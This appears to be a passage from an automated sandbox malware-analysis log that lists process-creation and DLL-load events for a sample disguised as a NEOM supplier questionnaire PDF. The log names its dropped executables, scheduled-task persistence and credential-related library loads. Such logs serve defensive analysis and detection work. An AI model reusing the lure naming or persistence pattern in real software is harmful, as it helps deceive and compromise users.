Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8F22.tmp.cmd""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: version.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winmm.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mpr.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wininet.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: userenv.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: secur32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sxs.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: appmanagementconfiguration.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: version.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winmm.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mpr.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wininet.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: userenv.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: secur32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sxs.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: webio.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: winhttp.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: netapi32.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: dsreg.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: msvcp110_win.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: msasn1.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: mpr.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: secur32.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: sspicli.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: dnsapi.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: iphlpapi.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: ntmarta.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: edputil.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
